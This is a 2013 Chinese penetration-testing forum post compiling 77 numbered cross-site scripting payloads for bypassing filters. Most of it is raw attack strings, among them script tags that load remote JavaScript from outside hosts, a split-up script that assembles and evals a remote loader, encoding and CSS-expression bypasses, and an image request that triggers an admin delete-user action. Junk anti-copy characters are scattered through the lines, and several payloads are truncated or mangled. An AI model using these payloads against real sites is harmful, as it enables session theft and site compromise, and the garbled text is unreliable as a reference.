中国网络渗透测试联盟

标题: XSS攻击汇总 [打印本页]

作者: admin    时间: 2013-4-19 19:22
标题: XSS攻击汇总
貌似关于xss的资料t00ls比较少,看见好东西Copy过来,不知道有木有童鞋需要Mark的。
" v' F6 w7 U$ `: }! V* c* E/ n( c(1)普通的XSS JavaScript注入4 z1 v6 q. K. S0 T8 g
<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>
+ a5 i  H% l1 }7 H(2)IMG标签XSS使用JavaScript命令
+ l  q& x  R, f! `<SCRIPT SRC=http://3w.org/XSS/xss.js></SCRIPT>) g7 ~( z! l; t- V- G- R! y" r, D
(3)IMG标签无分号无引号
* a$ k' _4 N# c/ M<IMG SRC=javascript:alert(‘XSS’)>
, D: Z$ q3 I7 S, O  e(4)IMG标签大小写不敏感; J4 \. Y. m6 |
<IMG SRC=JaVaScRiPt:alert(‘XSS’)>
6 j$ M9 }) m# L+ T7 v! ?; B(5)HTML编码(必须有分号)/ j$ i: D+ A4 [0 i. {" a$ _9 b; O
<IMG SRC=javascript:alert(“XSS”)>( z) o" Z8 I; ~; X
(6)修正缺陷IMG标签* R) K3 a% B0 p4 R/ \2 Y: M
<IMG “”"><SCRIPT>alert(“XSS”)</SCRIPT>”>! h! @9 l$ Q# H  r

) l- B$ x% |1 a9 b6 a, ^+ s9 k
! l  g& x* X+ H$ l8 [! R! d/ j. q9 R(7)formCharCode标签(计算器)
" D. t' U* F! O# m  ~9 n+ j% o<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
6 n5 M( k8 D9 k# D(8)UTF-8的Unicode编码(计算器)
6 z3 b" R% S. V) I' S8 F, _' ~<IMG SRC=jav..省略..S')>- [! Q5 }: h+ |% m; m: m
(9)7位的UTF-8的Unicode编码是没有分号的(计算器)
% Q1 N0 X$ j3 W8 U' q<IMG SRC=jav..省略..S')>
1 Y5 b' J( V; j8 z(10)十六进制编码也是没有分号(计算器)+ r4 w; w) L/ ?% u( D
<IMG SRC=&#x6A&#x61&#x76&#x61..省略..&#x58&#x53&#x53&#x27&#x29>
( w! C; i& Q7 n- _# [# \) v(11)嵌入式标签,将Javascript分开+ r. {9 X% F* L$ G" p  V
<IMG SRC=”jav ascript:alert(‘XSS’);”>
# |) g, g  K7 o/ X4 c( q5 P3 O(12)嵌入式编码标签,将Javascript分开* w& z+ l. X& A( j
<IMG SRC=”jav ascript:alert(‘XSS’);”>& p& S. H% Y  G
(13)嵌入式换行符
( J2 E+ M( j6 C+ o<IMG SRC=”jav ascript:alert(‘XSS’);”>
% K  C8 D; s: k  R4 L) l2 E2 e(14)嵌入式回车2 B* |9 s1 ~. P. p, v3 B3 a
<IMG SRC=”jav ascript:alert(‘XSS’);”>4 M: F* y# c8 g0 D% T& T) f
(15)嵌入式多行注入JavaScript,这是XSS极端的例子
4 D+ o. q& }! o3 n5 R1 X<IMG SRC=”javascript:alert(‘XSS‘)”>. G. W7 y$ p! z/ d; y. W/ ]
(16)解决限制字符(要求同页面)
$ t3 B; O% {) I4 g5 h- }. x$ T+ e<script>z=’document.’</script>* f$ }+ B, n. F2 V' T. J2 @5 a) k
<script>z=z+’write(“‘</script>7 C5 Z* P" l! ^. ^+ F$ v
<script>z=z+’<script’</script>$ {( P6 }8 S' e, J, z" P
<script>z=z+’ src=ht’</script>
# ]: c& @1 _4 M$ c: ?<script>z=z+’tp://ww’</script>
4 v6 H  G' R7 Z0 X; `<script>z=z+’w.shell’</script>
$ _, ]2 `8 P3 k  {" n& g1 i, r<script>z=z+’.net/1.’</script>
+ R! |  [" n! X/ w/ k; ]<script>z=z+’js></sc’</script>
7 {1 P$ i6 s0 K. \  e3 t<script>z=z+’ript>”)’</script>
# Q7 t( y0 s) L  S<script>eval_r(z)</script>5 _, g( l2 d* r2 Z& l; _1 A8 B
(17)空字符12-7-1 T00LS - Powered by Discuz! Board
: U& p# m5 n5 j" T. R6 Vhttps://www.t00ls.net/viewthread ... table&tid=15267 2/68 E" p9 R8 K: h5 |7 P9 i* ?$ a4 {
perl -e ‘print “<IMG SRC=java\0script:alert(\”XSS\”)>”;’ > out) d0 W+ U, R% r( v
(18)空字符2,空字符在国内基本没效果.因为没有地方可以利用' `6 u( n$ g2 s0 T9 u8 \, q* F6 o
perl -e ‘print “<SCR\0IPT>alert(\”XSS\”)</SCR\0IPT>”;’ > out
$ b; {, p5 ~, M% `/ K- B/ j, v(19)Spaces和meta前的IMG标签
2 ]2 ]: j0 `- `) ~<IMG SRC=” javascript:alert(‘XSS’);”>
/ x9 a' D  [: u4 t( c* c9 \  g' `(20)Non-alpha-non-digit XSS: R. ^- i. S3 {. v) \* b
<SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js”></SCRIPT>8 m% P: c# N" M* r; S! w* i
(21)Non-alpha-non-digit XSS to 20 f% \, E0 M7 |! H/ ^0 @
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert(“XSS”)>
( i+ `& m7 ^5 w! L(22)Non-alpha-non-digit XSS to 3
* ?4 Q2 w7 A4 ?<SCRIPT/SRC=”http://3w.org/XSS/xss.js”></SCRIPT>" ?4 K0 E- \, T/ i& ?3 j
(23)双开括号
! o# u4 ^: j! f" w4 ~9 A<<SCRIPT>alert(“XSS”);//<</SCRIPT>: F. z( e) u0 X0 o) J9 x5 i
(24)无结束脚本标记(仅火狐等浏览器)2 _. @9 e6 T6 X" D6 ^
<SCRIPT SRC=http://3w.org/XSS/xss.js?<B>
4 n# V. f+ H& @(25)无结束脚本标记2; f- e1 ^! U. ?' y' n4 \4 c8 l
<SCRIPT SRC=//3w.org/XSS/xss.js>
7 ]) g9 K- f. J2 \(26)半开的HTML/JavaScript XSS
5 O1 n/ U  k8 `<IMG SRC=”javascript:alert(‘XSS’)”
: I$ g& F7 |% ^6 r3 g5 S(27)双开角括号2 x0 K3 A# Y6 V/ Y
<iframe src=http://3w.org/XSS.html <9 m9 y/ \$ E( x4 q
(28)无单引号 双引号 分号% q! D/ ^# j, k! c' J0 a9 C8 S
<SCRIPT>a=/XSS/
! S$ t3 x9 d9 Talert(a.source)</SCRIPT>
- c" b! ~0 ~. D, H(29)换码过滤的JavaScript
+ o& B3 a$ I0 `, t0 m3 F\”;alert(‘XSS’);//( ]4 a! A5 ^9 U2 n/ U0 g% a$ \! N
(30)结束Title标签
* n/ w- B+ C4 E$ v5 l5 |</TITLE><SCRIPT>alert(“XSS”);</SCRIPT># j/ W. c) G, h! s) [
(31)Input Image
3 E* u& B; ~; z8 g! ]( F1 {" V<INPUT SRC=”javascript:alert(‘XSS’);”>
4 B* v% ^+ W' r/ ](32)BODY Image
& x# K. \" [, M1 Q<BODY BACKGROUND=”javascript:alert(‘XSS’)”>
  p9 \5 _! b/ ]5 {+ ?7 @  D7 @+ s(33)BODY标签  ?6 M% l1 v: f2 f; Q5 v4 e  T2 [+ Q
<BODY(‘XSS’)>
  l5 m  z! v" A5 {" Z(34)IMG Dynsrc5 m' C( ]7 M1 ~2 Y
<IMG DYNSRC=”javascript:alert(‘XSS’)”>
8 `* G, Q: o6 {(35)IMG Lowsrc
! @3 q  {/ N% F+ K0 \<IMG LOWSRC=”javascript:alert(‘XSS’)”>
4 F; @; D* x7 Y8 W! D(36)BGSOUND; q; g: |2 `! z- i
<BGSOUND SRC=”javascript:alert(‘XSS’);”>
% ]& a  x7 B$ n9 Q/ I(37)STYLE sheet
. g3 U  o0 N6 ^% M( b1 q) O3 q<LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”>
7 s9 v* z1 C( _8 @0 Q(38)远程样式表6 s4 a( {2 s# Y5 M) @4 W
<LINK REL=”stylesheet” HREF=”http://3w.org/xss.css”>
6 J3 A' C, c( `( S(39)List-style-image(列表式)
+ [) u7 P" V6 I) ?) S9 f4 p<STYLE>li {list-style-image: url(“javascript:alert(‘XSS’)”);}</STYLE><UL><LI>XSS: `  f1 x" W$ O" C& W0 D( V
(40)IMG VBscript+ ?& U$ a( Y5 V
<IMG SRC=’vbscript:msgbox(“XSS”)’></STYLE><UL><LI>XSS2 w! I/ S! i$ |7 n6 a( W+ K+ W
(41)META链接url
  d; h7 e$ J% l8 v! V5 c* y. R# n/ q0 H- C& z7 s; Q9 U' m
# l4 L5 b3 h' g# a
<META HTTP-EQUIV=”refresh” CONTENT=”0;
6 P2 v* b# P1 m' r$ Z( ^URL=http://;URL=javascript:alert(‘XSS’);”>7 P8 H( g, z& ]3 ?( C+ U
(42)Iframe4 A, f! i6 }" {6 ^% M9 e$ Z
<IFRAME SRC=”javascript:alert(‘XSS’);”></IFRAME>6 x% `7 z( T. i. j
(43)Frame  K8 t: ~6 b' G4 D. t; {% |
<FRAMESET><FRAME SRC=”javascript:alert(‘XSS’);”></FRAMESET>12-7-1 T00LS - Powered by Discuz! Board
1 V1 ]) M, E0 ?$ m3 i5 u' ^: lhttps://www.t00ls.net/viewthread ... table&tid=15267 3/69 x: R" ]6 E1 {9 P' I. K& P! F
(44)Table
0 Y& H1 {  k, ~$ B* C<TABLE BACKGROUND=”javascript:alert(‘XSS’)”>% r8 W! D5 X' U2 r; Z* T# u3 W2 K
(45)TD# A$ F6 [, V# W
<TABLE><TD BACKGROUND=”javascript:alert(‘XSS’)”>
# y, Q/ H: K. E4 g(46)DIV background-image
' t- G  p# B! g<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>8 }# D' W  `; G
(47)DIV background-image后加上额外字符(1-32&34&39&160&8192-3 V( U6 Q- v! _" n$ h; J
8&13&12288&65279)
! f' c% r% ^& G<DIV STYLE=”background-image: url(javascript:alert(‘XSS’))”>
! _# ~0 y  ^5 |8 ?0 w(48)DIV expression
& Z4 I& O3 \  X8 O+ B<DIV STYLE=”width: expression_r(alert(‘XSS’));”>+ K" X( T  G% X' c) u
(49)STYLE属性分拆表达  _1 j. g& A8 m, `- j4 C: \7 ]
<IMG STYLE=”xss:expression_r(alert(‘XSS’))”>
6 \, S6 h& h, E2 V+ L2 Q(50)匿名STYLE(组成:开角号和一个字母开头)3 e5 ]) G0 L* w# _
<XSS STYLE=”xss:expression_r(alert(‘XSS’))”>
" K& R6 i$ {. T(51)STYLE background-image( W6 [1 i3 a* T% N
<STYLE>.XSS{background-image:url(“javascript:alert(‘XSS’)”);}</STYLE><A, c3 M( S; r  w2 ^( O2 w
CLASS=XSS></A>( c8 n# }+ q& T) G
(52)IMG STYLE方式- H2 k: N- X- R1 X" A6 @' E  s
exppression(alert(“XSS”))’>
9 z6 E& q: R5 g+ }' P& B(53)STYLE background* ~* O9 w4 [; a0 C* w: i
<STYLE><STYLE
$ D/ g4 \7 ?, Y9 ?7 [0 u$ Ltype=”text/css”>BODY{background:url(“javascript:alert(‘XSS’)”)}</STYLE>* q/ E4 Y6 a9 q8 X9 R( ^# I
(54)BASE
& z; F2 S% K" o  q, ?$ w7 M; m<BASE HREF=”javascript:alert(‘XSS’);//”>
5 p0 u* g+ N: Z1 ]* N& ]2 v: e# }(55)EMBED标签,你可以嵌入FLASH,其中包涵XSS
! ^$ [7 ~7 J1 g) ~+ y<EMBED SRC=”http://3w.org/XSS/xss.swf” ></EMBED>1 }6 X5 t7 w# J' w$ O5 l
(56)在flash中使用ActionScrpt可以混进你XSS的代码) ^0 a/ [. l9 k& J8 L
a=”get”;
$ L0 S( N1 |5 A4 ~& ^3 Cb=”URL(\”";
. d3 u8 a' l8 j6 |- D' A( yc=”javascript:”;3 v3 S% k: g7 o! r, ?
d=”alert(‘XSS’);\”)”;
- z0 B, X  f2 b9 j# Xeval_r(a+b+c+d);$ q6 w% `0 f3 b* t! ~  Q
(57)XML namespace.HTC文件必须和你的XSS载体在一台服务器上
. U' ?9 y4 I6 m" A( _<HTML xmlns:xss>; \1 J: H9 B* Q$ c, |" x
<?import namespace=”xss” implementation=”http://3w.org/XSS/xss.htc”>5 A% `( @. Y1 X4 S" o1 ?' [
<xss:xss>XSS</xss:xss>  n* ~+ }" A8 c- ^
</HTML>  m" I& j2 T4 R& ]$ X+ e
(58)如果过滤了你的JS你可以在图片里添加JS代码来利用
8 |; d, I& H$ q0 H6 v/ b" j<SCRIPT SRC=””></SCRIPT>
! ~( V! K2 S+ W, |: t(59)IMG嵌入式命令,可执行任意命令
8 m, n: l8 _" q: R/ b<IMG SRC=”http://www.XXX.com/a.php?a=b”>
" k2 I  g' H/ I  T! w$ L(60)IMG嵌入式命令(a.jpg在同服务器). q( T8 e5 ~2 i2 C
Redirect 302 /a.jpg http://www.XXX.com/admin.asp&deleteuser+ ~+ x" d+ {; ~) @! [
(61)绕符号过滤# {0 V. a3 q* _# c
<SCRIPT a=”>” SRC=”http://3w.org/xss.js”></SCRIPT>, F- P+ N, r; Y2 \8 N
(62)
. ]/ Q% P1 U5 H' a<SCRIPT =”>” SRC=”http://3w.org/xss.js”></SCRIPT>3 S& E5 b8 i6 s& t* i2 T
(63): M" p, E' G& E$ z$ Q. W, O& {) P" @( t
<SCRIPT a=”>” ” SRC=”http://3w.org/xss.js”></SCRIPT>! r0 M  i& C- W8 P% E3 e$ W: n& s
(64)- S+ G" h/ R7 |. Q1 ]9 ?
<SCRIPT “a=’>’” SRC=”http://3w.org/xss.js”></SCRIPT>% B! k/ d% i0 V6 t3 t" B  _
(65)
# m- o& f: i3 b$ j<SCRIPT a=`>` SRC=”http://3w.org/xss.js”></SCRIPT>- X; E. E' G- j% |! c
(66)12-7-1 T00LS - Powered by Discuz! Board
& _; w$ @9 z& n0 I( Qhttps://www.t00ls.net/viewthread ... table&tid=15267 4/6
$ {, |) b. |) B+ K0 m<SCRIPT a=”>’>” SRC=”http://3w.org/xss.js”></SCRIPT>
4 n6 }: Q9 j9 V' P& S(67), ?* V, X6 M- s9 X% V
<SCRIPT>document.write(“<SCRI”);</SCRIPT>PT SRC=”http://3w.org/xss.js”>
, H  o9 O" V) C, L</SCRIPT>0 @9 W, q# V! o' L' ^/ h
(68)URL绕行/ K% Y3 O6 y% `- j% J1 p
<A HREF=”http://127.0.0.1/”>XSS</A>
1 n; b' m3 [8 w6 `0 o+ ](69)URL编码2 U* w! V$ C1 g$ }7 R' }& G' n
<A HREF=”http://3w.org”>XSS</A>5 \8 O, X* _3 a( D" ~0 Z7 ~, |; o
(70)IP十进制
( r# h0 p1 ]6 \: i6 j( J<A HREF=”http://3232235521″>XSS</A>
5 \) X. ~8 _' h(71)IP十六进制
5 s" y$ O9 f0 D5 P+ e- g9 F9 f3 H<A HREF=”http://0xc0.0xa8.0×00.0×01″>XSS</A>+ L" }1 h' d" \6 |. b
(72)IP八进制
$ H& P  a9 l) n<A HREF=”http://0300.0250.0000.0001″>XSS</A>/ a; W* `. q# e( p
(73)混合编码9 S3 e: [% x- J1 l
<A HREF=”h2 J/ n* L9 i4 K3 q* h" ~1 T7 B. h/ E& x
tt p://6 6.000146.0×7.147/”">XSS</A>7 c) v6 S. _. ]5 B2 Z. W0 K: q
(74)节省[http:]
) H. i4 |6 d6 k, a<A HREF=”//www.google.com/”>XSS</A>8 n5 Y4 L% `9 @$ q" ^$ n% t  g
(75)节省[www]; Y/ q& d) |& R, v& n2 w
<A HREF=”http://google.com/”>XSS</A>7 g9 |* ]9 @* a) j2 A" s( s( e
(76)绝对点绝对DNS. c; y7 U( v% L& J7 c4 Q
<A HREF=”http://www.google.com./”>XSS</A>
5 P( z; N7 M3 h0 F(77)javascript链接# _8 c7 d" p. P2 N1 E' J: x: }$ C
<A HREF=”javascript:document.location=’http://www.google.com/’”>XSS</A>% S! s, C$ k+ e1 R
4 t+ R( E1 F/ S; B( W
原文地址:http://fuzzexp.org/u/0day/?p=14
- q$ T6 m  A0 W8 f4 H- M
' @) ]* Y7 Z+ K# p




欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2